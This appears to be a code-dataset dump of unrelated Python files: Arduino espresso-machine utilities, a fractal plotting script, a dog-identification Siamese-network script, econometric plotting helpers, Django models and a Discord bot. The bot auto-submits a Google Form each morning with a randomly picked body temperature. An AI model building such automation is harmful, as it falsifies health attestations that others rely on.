b8113b52e8468c659bd762f7d22243269bef3984
[ "MIT" ]
null
null
null
"""Utility functions.""" import enum import json import struct import subprocess import time import numpy as np # Measurements contain 5 floats (elapsed_time, basket_resistance, # group_resistance, basket_temperature, and group_temperature) and an int # (state, for which 0, 1, 2, and 3 map to START, RUNNING, STOP, and STOPPED, # respectively). FORMAT_STRING = 'fffffi' def compile_and_upload(fqbn, port): """Compiles the Arduino sketch and uploads it to the device. Args: fbqn: str, fully qualified board name. port: str, upload port. """ subprocess.run(['arduino-cli', 'compile', '--fqbn', fqbn, 'espresso-shot']) subprocess.run(['arduino-cli', 'upload', '-p', port, '--fqbn', fqbn, 'espresso-shot']) def find_port_if_not_specified(fqbn, port): """Finds an upload port if it's left unspecified. If `port` is None, then uses `arduino-cli board list` to find all boards connected to the computer with the specified fully qualified board name and sets `port` to that of the first board found. Args: fbqn: str, fully qualified board name. port: str or None, upload port. Returns: port: str, the upload port. Raises: RuntimeError, if `port` is None and no board with the specified fully qualified board name is connected to the computer. """ process = subprocess.Popen( ['arduino-cli', 'board', 'list', '--format', 'json'], stdout=subprocess.PIPE) devices = json.loads(process.communicate()[0].decode('utf-8')) for device in devices: if 'boards' in device and any(board['FQBN'] == fqbn for board in device['boards']): port = port or device['address'] break if port is None: raise RuntimeError('no port specified and no board with the specified ' 'FQBN was found.') return port def read_measurement(serial_port): """Reads a measurement from the serial port. Args: serial_port: Serial, serial port to read from. Returns: tuple of (float, float, float, float, float, int) of form (elapsed_time, basket_resistance, group_resistance, basket_temperature, group_temperature, state). """ return struct.unpack( FORMAT_STRING, serial_port.read(struct.calcsize(FORMAT_STRING))) class MockSerial: """Mock serial port used to test the interface when no device is available. We simulate alternating between pulling a shot for 30 seconds and letting the machine idle for 30 seconds, but we have time run twice as fast for convenience. """
30.106383
79
0.673027
"""Utility functions.""" import enum import json import struct import subprocess import time import numpy as np # Measurements contain 5 floats (elapsed_time, basket_resistance, # group_resistance, basket_temperature, and group_temperature) and an int # (state, for which 0, 1, 2, and 3 map to START, RUNNING, STOP, and STOPPED, # respectively). FORMAT_STRING = 'fffffi' class State(enum.IntEnum): START = 0 RUNNING = 1 STOP = 2 STOPPED = 3 def compile_and_upload(fqbn, port): """Compiles the Arduino sketch and uploads it to the device. Args: fbqn: str, fully qualified board name. port: str, upload port. """ subprocess.run(['arduino-cli', 'compile', '--fqbn', fqbn, 'espresso-shot']) subprocess.run(['arduino-cli', 'upload', '-p', port, '--fqbn', fqbn, 'espresso-shot']) def find_port_if_not_specified(fqbn, port): """Finds an upload port if it's left unspecified. If `port` is None, then uses `arduino-cli board list` to find all boards connected to the computer with the specified fully qualified board name and sets `port` to that of the first board found. Args: fbqn: str, fully qualified board name. port: str or None, upload port. Returns: port: str, the upload port. Raises: RuntimeError, if `port` is None and no board with the specified fully qualified board name is connected to the computer. """ process = subprocess.Popen( ['arduino-cli', 'board', 'list', '--format', 'json'], stdout=subprocess.PIPE) devices = json.loads(process.communicate()[0].decode('utf-8')) for device in devices: if 'boards' in device and any(board['FQBN'] == fqbn for board in device['boards']): port = port or device['address'] break if port is None: raise RuntimeError('no port specified and no board with the specified ' 'FQBN was found.') return port def read_measurement(serial_port): """Reads a measurement from the serial port. Args: serial_port: Serial, serial port to read from. Returns: tuple of (float, float, float, float, float, int) of form (elapsed_time, basket_resistance, group_resistance, basket_temperature, group_temperature, state). """ return struct.unpack( FORMAT_STRING, serial_port.read(struct.calcsize(FORMAT_STRING))) class MockSerial: """Mock serial port used to test the interface when no device is available. We simulate alternating between pulling a shot for 30 seconds and letting the machine idle for 30 seconds, but we have time run twice as fast for convenience. """ def __init__(self, **kwargs): self._time = 0 self._period = 30 self._running = True def read(self, size=1): # One simulated second lasts half a real-time second. time.sleep(0.5) # Sample random basket and group readings. basket_resistance = np.random.normal(loc=10000.0, scale=100.0) group_resistance = np.random.normal(loc=10000.0, scale=100.0) basket_temperature = np.random.normal(loc=92.0, scale=0.5) group_temperature = np.random.normal(loc=92.0, scale=0.5) # The device displays the previous shot's time when the machine is idle. elapsed_time = self._time if self._running else self._period # Determine the device's state. if self._running: # The state is 'START' at the first measurement of a shot, and 'RUNNING' # afterwards. state = State.START if self._time == 0 else State.RUNNING else: # The first measurement at the end of the shot has state 'STOP', and # subsequent measurements have state 'STOPPED'. state = ( State.STOP if (self._time == self._period and self._running) else State.STOPPED) # Advance simulated time by one second, and reset to zero after 30 seconds # has passed. 
self._time = (self._time + 1) % (self._period + 1) # Switch between "pulling a shot" and "idle" at every cycle. if self._time == 0: self._running = not self._running return struct.pack( 'fffffi', elapsed_time, basket_resistance, group_resistance, basket_temperature, group_temperature, int(state))
1,557
56
73
d63c354c403a2f8213840fefd6b381f385a4e15a
239
py
Python
setup.py
jangroth/gtit-cv
6c912dcd11ced9f6613a36697a99eac86bf6480e
[ "MIT" ]
2
2021-09-27T17:55:54.000Z
2021-11-15T11:43:02.000Z
setup.py
jangroth/git-cv
6c912dcd11ced9f6613a36697a99eac86bf6480e
[ "MIT" ]
null
null
null
setup.py
jangroth/git-cv
6c912dcd11ced9f6613a36697a99eac86bf6480e
[ "MIT" ]
null
null
null
from setuptools import setup, find_packages setup( name="gitcv", version="0.1", packages=find_packages(), author="Jan Groth", license="MIT License", setup_requires=['pytest-runner'], tests_require=['pytest'] )
19.916667
43
0.661088
from setuptools import setup, find_packages setup( name="gitcv", version="0.1", packages=find_packages(), author="Jan Groth", license="MIT License", setup_requires=['pytest-runner'], tests_require=['pytest'] )
0
0
0
a573cae0a3b0113b03c43c3f97dc1f74f8754061
1,653
py
Python
sine_attractors.py
dcxSt/attractors
7df0fc593ca7bc2dbc05d488b1742fc359cf6c7f
[ "MIT" ]
1
2021-11-07T11:56:53.000Z
2021-11-07T11:56:53.000Z
sine_attractors.py
dcxSt/attractors
7df0fc593ca7bc2dbc05d488b1742fc359cf6c7f
[ "MIT" ]
null
null
null
sine_attractors.py
dcxSt/attractors
7df0fc593ca7bc2dbc05d488b1742fc359cf6c7f
[ "MIT" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # http://paulbourke.net/fractals/clifford/?curius=373 # In[13]: import numpy as np import math as m import matplotlib.pyplot as plt # In[65]: a = -1.5 b = 1.6 c = 1.2 d = 0.7 # In[66]: # In[ ]: # In[77]: sidelength = 8192 center = (sidelength // 2 , sidelength // 2) grid = np.zeros((sidelength,sidelength)) x,y = 0,0 for i in range(30000000): x,y = update(x,y) posx = int(x * sidelength / 5) + center[0] posy = int(y * sidelength / 4) + center[1] if posx < sidelength and posx >= 0 and posy < sidelength and posy >= 0: grid[posx][posy] += 2 else: print(posx, posy) # print(x,y) # In[74]: max(grid.flatten()), max(np.log(grid.flatten() + 1)) # In[88]: lovely_cmaps = ["YlGn","rainbow", "gnuplot2"] for cmap in lovely_cmaps: plt.figure(figsize=(20,20)) plt.imshow(np.log(grid + 1), cmap=cmap) plt.tick_params( axis='both', # changes apply to the x-axis which='both', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False, labelleft=False, left=False, right=False) # labels along the bottom edge are off plt.axis("off") plt.savefig("convergence_orbweaver_{}.png".format(cmap)) print("convergence_orbweaver_{}.png".format(cmap)) plt.show() # In[ ]:
17.967391
75
0.586812
#!/usr/bin/env python # coding: utf-8 # http://paulbourke.net/fractals/clifford/?curius=373 # In[13]: import numpy as np import math as m import matplotlib.pyplot as plt # In[65]: a = -1.5 b = 1.6 c = 1.2 d = 0.7 # In[66]: def update(x,y): # takes floats, returns updated floats xnew = m.sin(a * y) + c * m.cos(a * x) ynew = m.sin(b * x) + d * m.cos(b * y) return xnew, ynew # In[ ]: # In[77]: sidelength = 8192 center = (sidelength // 2 , sidelength // 2) grid = np.zeros((sidelength,sidelength)) x,y = 0,0 for i in range(30000000): x,y = update(x,y) posx = int(x * sidelength / 5) + center[0] posy = int(y * sidelength / 4) + center[1] if posx < sidelength and posx >= 0 and posy < sidelength and posy >= 0: grid[posx][posy] += 2 else: print(posx, posy) # print(x,y) # In[74]: max(grid.flatten()), max(np.log(grid.flatten() + 1)) # In[88]: lovely_cmaps = ["YlGn","rainbow", "gnuplot2"] for cmap in lovely_cmaps: plt.figure(figsize=(20,20)) plt.imshow(np.log(grid + 1), cmap=cmap) plt.tick_params( axis='both', # changes apply to the x-axis which='both', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False, labelleft=False, left=False, right=False) # labels along the bottom edge are off plt.axis("off") plt.savefig("convergence_orbweaver_{}.png".format(cmap)) print("convergence_orbweaver_{}.png".format(cmap)) plt.show() # In[ ]:
146
0
23
0f36567e3c2d414731c0ed12a4624896fc40e0c8
4,105
py
Python
bot.py
MistyScene/AutoForms
e5391e95acfc1aaeae5bec635845203f7ff6b027
[ "MIT" ]
null
null
null
bot.py
MistyScene/AutoForms
e5391e95acfc1aaeae5bec635845203f7ff6b027
[ "MIT" ]
null
null
null
bot.py
MistyScene/AutoForms
e5391e95acfc1aaeae5bec635845203f7ff6b027
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import discord from discord import Embed from discord.ext import tasks from datetime import datetime import os import requests import random import json TOKEN = os.environ["TOKEN"] client = discord.Client(intents=discord.Intents.all()) # 次回送信予定時刻を06:00-8:30までの間でランダムに設定 time_set = setting_time_set() # 起動時に初回の次回送信時刻を設定 tem_set = set_tem() # Embedの関数 @client.event @client.event @tasks.loop(seconds=60) loop.start() client.run(TOKEN)
34.208333
120
0.625335
# -*- coding: utf-8 -*- import discord from discord import Embed from discord.ext import tasks from datetime import datetime import os import requests import random import json TOKEN = os.environ["TOKEN"] client = discord.Client(intents=discord.Intents.all()) # 次回送信予定時刻を06:00-8:30までの間でランダムに設定 def setting_time_set(): setting_time_h = random.randint(6, 8) if setting_time_h == 8: setting_time_m = random.randint(0, 30) else: setting_time_m = random.randint(0, 59) setting_time = f"{setting_time_h:02}:{setting_time_m:02}" return setting_time def set_tem(): choice_list = ["36.4", "36.5", "36.6"] choice_ans = random.choice(choice_list) # 36.4-36.6までの間でランダムに選択 return choice_ans time_set = setting_time_set() # 起動時に初回の次回送信時刻を設定 tem_set = set_tem() # Embedの関数 async def template_embed(message, title, name_1, name_2, value_1, color, description=None): ch = client.get_channel(message) embed_time = datetime.now().strftime("%Y年%m月%d日-%H:%M") embed = Embed(title=title, description=description, color=color) embed.add_field(name=name_1, value=f"{value_1}", inline=True) embed.add_field(name=name_2, value=f"{tem_set}", inline=True) embed.set_footer(text=f"{embed_time}") await ch.send("<@343956207754805251>") await ch.send(embed=embed) @client.event async def on_ready(): await template_embed(message=768274673984208926, title="起動ログ", name_1="次回の送信予定時刻", value_1=time_set, name_2="送信予定の体温", color=discord.Color.orange()) @client.event async def on_message(message): if message.content == "/reset": await reset(message) if message.content == "/now": await now(message) async def reset(message): global time_set global tem_set time_set = setting_time_set() tem_set = set_tem() await template_embed(message=768274673984208926, title="リセットされました", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.purple()) await template_embed(message=message.channel.id, title="リセットされました", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.purple()) async def now(message): await template_embed(message=message.channel.id, title="現在の状況", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.greyple()) @tasks.loop(seconds=60) async def loop(): global time_set global tem_set now_t = datetime.now().strftime('%H:%M') print(f"現在の時刻:{now_t}/送信予定時刻:{time_set}/送信予定体温:{tem_set}") if now_t == time_set: # 送信予定時刻になった? dt_now = datetime.now().strftime("%Y-%m-%d") # 現在時刻を2020-01-01の形で取得、dt_nowに格納 file_name = "cfg.json" with open(file_name, "r", encoding="utf-8")as f: cfg = json.load(f) cfg["output"]["ans_1"] = f"{dt_now}" cfg["output"]["ans_4"] = f"{tem_set}" params = {"entry.{}".format(cfg["entry"][k]): cfg["output"][k] for k in cfg["entry"].keys()} res = requests.get(cfg["form_url"] + "formResponse", params=params) if res.status_code == 200: await template_embed(message=768274673984208926, title="ログ情報", description=f"[URL]({res.url})", name_1="完了状態", name_2="送信された体温", value_1="成功しました", color=discord.Color.green()) else: res.raise_for_status() await template_embed(message=768274673984208926, title="ログ情報", name_1="完了状態", name_2="送信予定だった体温", value_1="エラーが発生しました。", color=discord.Color.red()) else: if now_t == "21:00": time_set = setting_time_set() tem_set = set_tem() await template_embed(message=768274673984208926, title="送信時刻更新のお知らせ", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.blue()) loop.start() client.run(TOKEN)
3,883
0
190
5609448a8b557b5dc9ac459a5689d4f1819a5e51
4,141
py
Python
exam.py
mfshiu/dog-siamese
3e9077f2231d9cc9ac8eea5ac246901d2d5e6729
[ "MIT" ]
null
null
null
exam.py
mfshiu/dog-siamese
3e9077f2231d9cc9ac8eea5ac246901d2d5e6729
[ "MIT" ]
null
null
null
exam.py
mfshiu/dog-siamese
3e9077f2231d9cc9ac8eea5ac246901d2d5e6729
[ "MIT" ]
null
null
null
import os import sys import torch from config import Config from train3 import image_size from model import SiameseNetwork from evaluate3 import TestDataset from torch.utils.data import DataLoader use_gpu = False register_dir = "./data/ct0202a/" threshold = 50 siam_model = None log_lines = [] ## if __name__ == '__main__': register_dir = Config.register_dir dog_id = None dog_img = None exam_dir = None model_path = "./trained/DogSiamese-2.pkl" for a in sys.argv[1:]: if a.lower() == 'gpu': use_gpu = True else: aa = a.split("=") if "dog" == aa[0]: dog_id = aa[1] elif "img" == aa[0]: dog_img = aa[1] elif "exam_dir" == aa[0]: exam_dir = aa[1] elif "model" == aa[0]: model_path = aa[1] else: register_dir = a print('Use gpu:', use_gpu) print('Register dir:', register_dir) print('Dog ID to be checked:', dog_id) print('Dog image to check:', dog_img) if use_gpu: siam_model = SiameseNetwork(image_size).cuda() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cuda:0'))) else: siam_model = SiameseNetwork(image_size).cpu() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu'))) siam_model.eval() if exam_dir: img_paths = [] sum_lines = [] for path, subdirs, files in os.walk(exam_dir): for name in files: img_paths.append(os.path.join(path, name)) img_paths.sort() for i, img in enumerate(img_paths): find_id, similarity = find_dog(img) if find_id: line = "%s = %s (%s)" % (img_paths[i], find_id, similarity) else: line = "%s = None" % (img_paths[i],) sum_lines.append("%s\n" % (line,)) print(line) elif dog_id: is_same = exam_dog(dog_id, dog_img)[0] if is_same: print("Yes, The dog is %s." % (dog_id,)) else: print("No, The dog is not %s." % (dog_id,)) else: find_id, similarity = find_dog(dog_img) if find_id: print("The dog is %s, similarity is %s" % (find_id, similarity)) else: print("Cannot find the dog.") with open("exam.log", "w") as fp: fp.writelines(sum_lines) fp.writelines("\nDetails ==================\n") fp.writelines(log_lines)
31.853846
99
0.581744
import os import sys import torch from config import Config from train3 import image_size from model import SiameseNetwork from evaluate3 import TestDataset from torch.utils.data import DataLoader use_gpu = False register_dir = "./data/ct0202a/" threshold = 50 siam_model = None log_lines = [] ## def exam_dog(dog_id, img_path): exam_count = Config.exam_count dog_dir = os.path.join(register_dir, dog_id) walked = [x for x in os.walk(dog_dir)][0] dog_paths = [os.path.join(walked[0], x) for x in walked[2]] dog_paths.sort() similarities = [] test_set = TestDataset(img_path, dog_paths[0: min(len(dog_paths), exam_count + 1)]) test_dataloader = DataLoader(test_set, shuffle=False, batch_size=1, num_workers=0) for i, data in enumerate(test_dataloader): img0, img1 = data if use_gpu: similarity = siam_model.evaluate(img0.cuda(), img1.cuda()) else: similarity = siam_model.evaluate(img0.cpu(), img1.cpu()) similarities.append(similarity) is_same = len([x for x in similarities if x > threshold]) > exam_count // 2 return is_same, similarities def find_dog(img_path): walked = [x for x in os.walk(register_dir)][0] dog_ids = walked[1] dog_ids.sort() max_avg = 0 hit_dog = None for dog_id in dog_ids: similarities = exam_dog(dog_id, img_path)[1] similarities.sort() avg = sum(similarities) / len(similarities) # avg = sum(similarities[Config.exam_count//2:]) / (len(similarities)-Config.exam_count//2) # avg = sum(x**2 for x in similarities)**0.5 # avg = max(similarities[]) log_lines.append("%s->%s(avg:%s,%s)\n" % (img_path, dog_id, avg, similarities)) if avg > threshold and max_avg < avg: max_avg = avg hit_dog = dog_id return hit_dog, max_avg if __name__ == '__main__': register_dir = Config.register_dir dog_id = None dog_img = None exam_dir = None model_path = "./trained/DogSiamese-2.pkl" for a in sys.argv[1:]: if a.lower() == 'gpu': use_gpu = True else: aa = a.split("=") if "dog" == aa[0]: dog_id = aa[1] elif "img" == aa[0]: dog_img = aa[1] elif "exam_dir" == aa[0]: exam_dir = aa[1] elif "model" == aa[0]: model_path = aa[1] else: register_dir = a print('Use gpu:', use_gpu) print('Register dir:', register_dir) print('Dog ID to be checked:', dog_id) print('Dog image to check:', dog_img) if use_gpu: siam_model = SiameseNetwork(image_size).cuda() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cuda:0'))) else: siam_model = SiameseNetwork(image_size).cpu() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu'))) siam_model.eval() if exam_dir: img_paths = [] sum_lines = [] for path, subdirs, files in os.walk(exam_dir): for name in files: img_paths.append(os.path.join(path, name)) img_paths.sort() for i, img in enumerate(img_paths): find_id, similarity = find_dog(img) if find_id: line = "%s = %s (%s)" % (img_paths[i], find_id, similarity) else: line = "%s = None" % (img_paths[i],) sum_lines.append("%s\n" % (line,)) print(line) elif dog_id: is_same = exam_dog(dog_id, dog_img)[0] if is_same: print("Yes, The dog is %s." % (dog_id,)) else: print("No, The dog is not %s." % (dog_id,)) else: find_id, similarity = find_dog(dog_img) if find_id: print("The dog is %s, similarity is %s" % (find_id, similarity)) else: print("Cannot find the dog.") with open("exam.log", "w") as fp: fp.writelines(sum_lines) fp.writelines("\nDetails ==================\n") fp.writelines(log_lines)
1,523
0
46
e460f5ef73e060f6a64ca12aa77375e312b5b1cf
3,974
py
Python
auxiliary/auxiliary.py
burakbalaban/student-project-burakbalaban
1b58ab1896e65937c16d9f5b4ff1a8bddc2d2db7
[ "MIT" ]
null
null
null
auxiliary/auxiliary.py
burakbalaban/student-project-burakbalaban
1b58ab1896e65937c16d9f5b4ff1a8bddc2d2db7
[ "MIT" ]
null
null
null
auxiliary/auxiliary.py
burakbalaban/student-project-burakbalaban
1b58ab1896e65937c16d9f5b4ff1a8bddc2d2db7
[ "MIT" ]
null
null
null
"""This module contains auxiliary function which we use in the example notebook.""" import json import matplotlib.patches as mpatches import matplotlib.pyplot as plt from scipy.stats import norm import pandas as pd import numpy as np from grmpy.estimate.estimate_output import calculate_mte from grmpy.read.read import read def process_data(df, output_file): """This function adds squared and interaction terms to the Cainero data set.""" # Delete redundant columns\n", for key_ in ['newid', 'caseid']: del df[key_] # Add squared terms for key_ in ['mhgc', 'cafqt', 'avurate', 'lurate_17', 'numsibs', 'lavlocwage17']: str_ = key_ + 'sq' df[str_] = df[key_] ** 2 # Add interaction terms for j in ['pub4', 'lwage5_17', 'lurate_17', 'tuit4c']: for i in ['cafqt', 'mhgc', 'numsibs']: df[j + i] = df[j] * df[i] df.to_pickle(output_file + '.pkl') def plot_est_mte(rslt, file): """This function calculates the marginal treatment effect for different quartiles of the unobservable V. ased on the calculation results.""" init_dict = read(file) data_frame = pd.read_pickle(init_dict['ESTIMATION']['file']) # Define the Quantiles and read in the original results quantiles = [0.0001] + np.arange(0.01, 1., 0.01).tolist() + [0.9999] mte_ = json.load(open('data/mte_original.json', 'r')) mte_original = mte_[1] mte_original_d = mte_[0] mte_original_u = mte_[2] # Calculate the MTE and confidence intervals mte = calculate_mte(rslt, init_dict, data_frame, quantiles) mte = [i / 4 for i in mte] mte_up, mte_d = calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles) # Plot both curves ax = plt.figure(figsize=(17.5, 10)).add_subplot(111) ax.set_ylabel(r"$B^{MTE}$", fontsize=24) ax.set_xlabel("$u_D$", fontsize=24) ax.tick_params(axis='both', which='major', labelsize=18) ax.plot(quantiles, mte, label='grmpy $B^{MTE}$', color='blue', linewidth=4) ax.plot(quantiles, mte_up, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_d, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_original, label='original$B^{MTE}$', color='orange', linewidth=4) ax.plot(quantiles, mte_original_d, color='orange', linestyle=':',linewidth=3) ax.plot(quantiles, mte_original_u, color='orange', linestyle=':', linewidth=3) ax.set_ylim([-0.41, 0.51]) ax.set_xlim([-0.005, 1.005]) blue_patch = mpatches.Patch(color='blue', label='original $B^{MTE}$') orange_patch = mpatches.Patch(color='orange', label='grmpy $B^{MTE}$') plt.legend(handles=[blue_patch, orange_patch],prop={'size': 16}) plt.show() return mte def calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles): """This function calculates the confidence interval of the marginal treatment effect.""" # Import parameters and inverse hessian matrix hess_inv = rslt['AUX']['hess_inv'] / data_frame.shape[0] params = rslt['AUX']['x_internal'] # Distribute parameters dist_cov = hess_inv[-4:, -4:] param_cov = hess_inv[:46, :46] dist_gradients = np.array([params[-4], params[-3], params[-2], params[-1]]) # Process data covariates = init_dict['TREATED']['order'] x = np.mean(data_frame[covariates]).tolist() x_neg = [-i for i in x] x += x_neg x = np.array(x) # Create auxiliary parameters part1 = np.dot(x, np.dot(param_cov, x)) part2 = np.dot(dist_gradients, np.dot(dist_cov, dist_gradients)) # Prepare two lists for storing the values mte_up = [] mte_d = [] # Combine all auxiliary parameters and calculate the confidence intervals for counter, i in enumerate(quantiles): value = part2 * (norm.ppf(i)) ** 2 aux = np.sqrt(part1 + value) / 4 mte_up += [mte[counter] + norm.ppf(0.95) * aux] 
mte_d += [mte[counter] - norm.ppf(0.95) * aux] return mte_up, mte_d
36.458716
92
0.657776
"""This module contains auxiliary function which we use in the example notebook.""" import json import matplotlib.patches as mpatches import matplotlib.pyplot as plt from scipy.stats import norm import pandas as pd import numpy as np from grmpy.estimate.estimate_output import calculate_mte from grmpy.read.read import read def process_data(df, output_file): """This function adds squared and interaction terms to the Cainero data set.""" # Delete redundant columns\n", for key_ in ['newid', 'caseid']: del df[key_] # Add squared terms for key_ in ['mhgc', 'cafqt', 'avurate', 'lurate_17', 'numsibs', 'lavlocwage17']: str_ = key_ + 'sq' df[str_] = df[key_] ** 2 # Add interaction terms for j in ['pub4', 'lwage5_17', 'lurate_17', 'tuit4c']: for i in ['cafqt', 'mhgc', 'numsibs']: df[j + i] = df[j] * df[i] df.to_pickle(output_file + '.pkl') def plot_est_mte(rslt, file): """This function calculates the marginal treatment effect for different quartiles of the unobservable V. ased on the calculation results.""" init_dict = read(file) data_frame = pd.read_pickle(init_dict['ESTIMATION']['file']) # Define the Quantiles and read in the original results quantiles = [0.0001] + np.arange(0.01, 1., 0.01).tolist() + [0.9999] mte_ = json.load(open('data/mte_original.json', 'r')) mte_original = mte_[1] mte_original_d = mte_[0] mte_original_u = mte_[2] # Calculate the MTE and confidence intervals mte = calculate_mte(rslt, init_dict, data_frame, quantiles) mte = [i / 4 for i in mte] mte_up, mte_d = calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles) # Plot both curves ax = plt.figure(figsize=(17.5, 10)).add_subplot(111) ax.set_ylabel(r"$B^{MTE}$", fontsize=24) ax.set_xlabel("$u_D$", fontsize=24) ax.tick_params(axis='both', which='major', labelsize=18) ax.plot(quantiles, mte, label='grmpy $B^{MTE}$', color='blue', linewidth=4) ax.plot(quantiles, mte_up, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_d, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_original, label='original$B^{MTE}$', color='orange', linewidth=4) ax.plot(quantiles, mte_original_d, color='orange', linestyle=':',linewidth=3) ax.plot(quantiles, mte_original_u, color='orange', linestyle=':', linewidth=3) ax.set_ylim([-0.41, 0.51]) ax.set_xlim([-0.005, 1.005]) blue_patch = mpatches.Patch(color='blue', label='original $B^{MTE}$') orange_patch = mpatches.Patch(color='orange', label='grmpy $B^{MTE}$') plt.legend(handles=[blue_patch, orange_patch],prop={'size': 16}) plt.show() return mte def calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles): """This function calculates the confidence interval of the marginal treatment effect.""" # Import parameters and inverse hessian matrix hess_inv = rslt['AUX']['hess_inv'] / data_frame.shape[0] params = rslt['AUX']['x_internal'] # Distribute parameters dist_cov = hess_inv[-4:, -4:] param_cov = hess_inv[:46, :46] dist_gradients = np.array([params[-4], params[-3], params[-2], params[-1]]) # Process data covariates = init_dict['TREATED']['order'] x = np.mean(data_frame[covariates]).tolist() x_neg = [-i for i in x] x += x_neg x = np.array(x) # Create auxiliary parameters part1 = np.dot(x, np.dot(param_cov, x)) part2 = np.dot(dist_gradients, np.dot(dist_cov, dist_gradients)) # Prepare two lists for storing the values mte_up = [] mte_d = [] # Combine all auxiliary parameters and calculate the confidence intervals for counter, i in enumerate(quantiles): value = part2 * (norm.ppf(i)) ** 2 aux = np.sqrt(part1 + value) / 4 mte_up += [mte[counter] + norm.ppf(0.95) * aux] 
mte_d += [mte[counter] - norm.ppf(0.95) * aux] return mte_up, mte_d
0
0
0
375be2219b434f699514d5dfd0f487eacc8beb7f
8,132
py
Python
dataentry/models.py
louisdijkstra/kumbhmela-metadata
59c6f22d0d5b307617ff03e3700c089f209788bf
[ "MIT" ]
null
null
null
dataentry/models.py
louisdijkstra/kumbhmela-metadata
59c6f22d0d5b307617ff03e3700c089f209788bf
[ "MIT" ]
null
null
null
dataentry/models.py
louisdijkstra/kumbhmela-metadata
59c6f22d0d5b307617ff03e3700c089f209788bf
[ "MIT" ]
null
null
null
from django.db import models from django.utils.encoding import python_2_unicode_compatible """ Contains the models/tables for the kumbhmela_db.sqlite3 database. Every field has (when necessary) a 'help_text' that explains the meaning of the field. """ __author__ = "Louis Dijkstra" @python_2_unicode_compatible class Drive(models.Model): """ Table/model to represent (a collection of) drive(s). """ label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5'.") external = models.BooleanField(default=False, help_text="True when the drive is external and false otherwise.") time_added = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was added to the drive bay.") time_removed = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was removed from the drive bay.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this (collection of) drive(s) (optional).") @python_2_unicode_compatible class DriveCopy(models.Model): """ Every Drive might have several copies. This table/model is used to keep track of them. """ drive = models.ForeignKey(Drive, on_delete=models.CASCADE, help_text="The unique drive it is a copy of.") label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5II'.") number = models.IntegerField(help_text="Drive copy number.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this drive copy (optional).") @python_2_unicode_compatible class Person(models.Model): """ Table/Model to represent a person """ name = models.CharField(max_length=100, help_text="First and last name.") email = models.CharField(max_length=200, blank=True, help_text="Email address(es) (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes (optional).") @python_2_unicode_compatible class Experiment(models.Model): """ Table/Model to represent the various subexperiments """ # every experiment is linked to a contact person contactperson = models.ForeignKey(Person, on_delete=models.CASCADE, help_text="Main contact person for this subexperiment.") name = models.CharField(max_length=100, help_text="Name of the subexperiment.") number = models.IntegerField(help_text="Number of the subexperiment.") description = models.TextField(max_length=1000, blank=True, help_text="Short description of the experiment (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on the subexperiment (optional).") @python_2_unicode_compatible class Format(models.Model): """ Table/model to represent a file format, i.e., the format in which output of a sensor is stored """ extension = models.CharField(max_length=50, help_text="Extension of the file (in small letters!), e.g., '.txt' and not '.TXT'.") description = models.TextField(max_length=10000, blank=True, help_text="Description of the file format (optional).") @python_2_unicode_compatible class Location(models.Model): """ Table/model to represent a (geo)location """ latitude = models.FloatField(blank=True, help_text="Optional.") longitude = models.FloatField(blank=True, help_text="Optional.") description = 
models.TextField(max_length=1000, blank=True, help_text="Description of the location (optional).") @python_2_unicode_compatible class Sensor(models.Model): """ Table/model to represent a sensor (e.g., camera/GPS device) """ sensor_type = models.CharField(max_length=100, help_text="Short description of the sensor, e.g., 'GoPro Camera'.") location = models.ManyToManyField(Location, blank=True, help_text="The location for this sensor (optional).") format = models.ManyToManyField(Format, blank=True, help_text="The format for the output of this sensor (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes for this sensor (optional).") @python_2_unicode_compatible class Source(models.Model): """ Table/model to represent a data source (e.g., 'Local police') """ name = models.CharField(max_length=200, help_text="Name of the data source (e.g., 'Local Police')") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this data source (optional).") @python_2_unicode_compatible class File(models.Model): """ The main table/model for this app. It is used to keep track of all files on the various drives for the Kumbh Mela experiment. """ # a file can be stored a several drives: drive = models.ManyToManyField(Drive, through='StorageLocation', help_text="The drives on which the file is stored.") format = models.ForeignKey(Format, on_delete=models.CASCADE, blank=True, null=True, help_text="Format of the file (optional).") experiment = models.ManyToManyField(Experiment, blank=True, help_text="The subexperiment this file belongs to (optional).") source = models.ForeignKey(Source, on_delete=models.CASCADE, blank=True, null=True, help_text="The data source (optional).") sensor = models.ForeignKey(Sensor, on_delete=models.CASCADE, blank=True, null=True, help_text="Sensor used to obtain the data (optional).") location = models.ForeignKey(Location, on_delete=models.CASCADE, blank=True, null=True, help_text="Location where the recording took place (optional).") time_added = models.DateTimeField(auto_now=True, blank=True, help_text="Time when the drive 